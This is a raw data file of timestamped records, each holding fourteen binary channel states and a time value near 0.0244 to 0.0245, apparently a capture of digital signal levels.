1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4405812e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4405836e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405844e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405884e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405908e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4405964e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4405988e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406036e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406060e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4406068e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4406084e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4406108e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406116e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406136e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406160e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406188e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406212e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406236e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406260e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406284e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406308e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406336e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406360e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4406364e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4406412e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4406436e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406444e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406460e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406484e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406508e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406536e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4406540e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4406560e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4406588e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406592e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406636e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406660e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406708e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406736e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406788e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406812e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406860e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406884e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4406892e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4406908e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4406936e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406940e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4406960e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4406988e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407012e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407036e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407060e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407084e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407108e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407136e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407160e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407188e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407212e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407236e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407260e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407284e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407308e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407336e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4407340e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4407388e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4407412e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4407436e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4407460e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407468e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407512e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407536e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407588e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407612e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407660e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407684e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4407692e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4407708e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4407736e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,2.4407740e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407744e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407760e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407788e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407812e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407836e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407884e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4407908e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4407960e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4407988e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4408036e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4408060e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408068e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408112e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408136e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408188e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408212e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408236e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408260e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408292e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408316e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408364e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408388e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408440e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4408468e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4408516e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4408540e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408548e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408592e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408616e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408668e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408692e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408716e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408740e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,2.4408744e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4408748e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4408788e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4408816e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,2.4408820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408824e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408840e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408868e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408892e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408916e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408940e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4408964e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4408988e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409016e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4409020e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4409068e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4409092e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409100e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4409116e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409140e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,2.4409144e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4409148e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4409192e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4409216e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,2.4409220e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409224e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4409240e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409268e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4409296e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409316e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4409340e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4409372e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4409396e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4409420e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,2.4409424e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409428e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4409468e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409492e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4409516e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409540e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4409548e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4409572e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4409592e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409604e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4409644e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409668e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4409716e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409744e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4409796e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409820e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4409868e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409892e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4409900e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4409916e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4409940e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409948e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4409968e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4409992e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4409996e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4410044e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4410068e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410076e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410092e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410116e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410140e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410168e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410220e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410244e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410268e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4410272e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.4410316e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.4410344e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410348e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410368e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410392e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410420e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410444e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410468e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410492e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410516e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410540e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410568e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410592e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410620e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410644e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410668e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410692e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410716e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410740e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410768e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410792e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410844e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410868e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410892e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410916e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410940e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4410968e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4410992e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4411020e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4411044e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4411068e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4411092e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4411116e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4411140e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.4411168e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.4411192e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4534900e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4535068e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4535092e-02 0,1,0,1,0,0,0,0,0,0,0,1,0,1,2.4535120e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4535140e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,2.4535436e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4535460e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,1,2.4535464e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.4535468e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.4535480e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.4535508e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.4535532e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.4535556e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.4535580e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.4535608e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.4535628e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.4535656e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,1,2.4535660e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4535664e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,2.4535680e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4535708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4535732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4535756e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4535780e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4535808e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4535812e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4535832e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4535856e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4535880e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4535908e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4535932e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4535956e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4535980e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4536008e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536012e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4536028e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536056e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4536080e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536108e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4536132e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536156e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4536160e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4536180e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4536208e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4536228e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4536256e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4536280e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4536308e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4536332e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4536356e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536364e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4536380e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536408e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4536428e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536456e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4536480e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4536508e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4536532e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4536556e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4536580e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4536608e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4536628e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4536656e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4536680e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4536708e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536712e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4536732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536756e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4536780e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536808e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4536856e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536884e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4536932e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4536956e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537008e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537032e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537108e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537156e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537180e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537232e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537256e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537280e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4537308e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4537332e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4537356e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4537380e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4537408e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4537436e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4537456e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4537484e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4537508e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4537532e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4537556e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537564e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537584e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537608e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537636e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537660e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537684e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537756e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537784e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537808e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537836e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537856e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,2.4537860e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4537864e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4537880e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4537908e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.4537912e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537916e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537932e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4537956e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4537980e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538004e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4538028e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538056e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4538060e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4538080e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4538108e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4538132e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4538156e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4538180e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4538204e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4538228e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4538256e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538260e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4538280e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538308e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4538332e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538356e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4538404e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538432e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4538484e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538508e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4538556e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538580e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4538632e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538656e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4538708e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538732e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4538780e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538804e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4538828e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538856e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4538860e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4538880e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4538908e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.4538912e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538916e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4538932e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4538956e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4538960e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4538980e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539004e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539028e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539056e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539080e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539108e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4539112e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4539132e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4539156e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4539180e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4539204e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4539228e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4539256e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539260e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539280e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539308e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539332e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539356e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539380e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539404e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539428e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539456e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539480e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539508e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4539512e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4539532e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4539556e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4539580e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4539608e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539612e-02 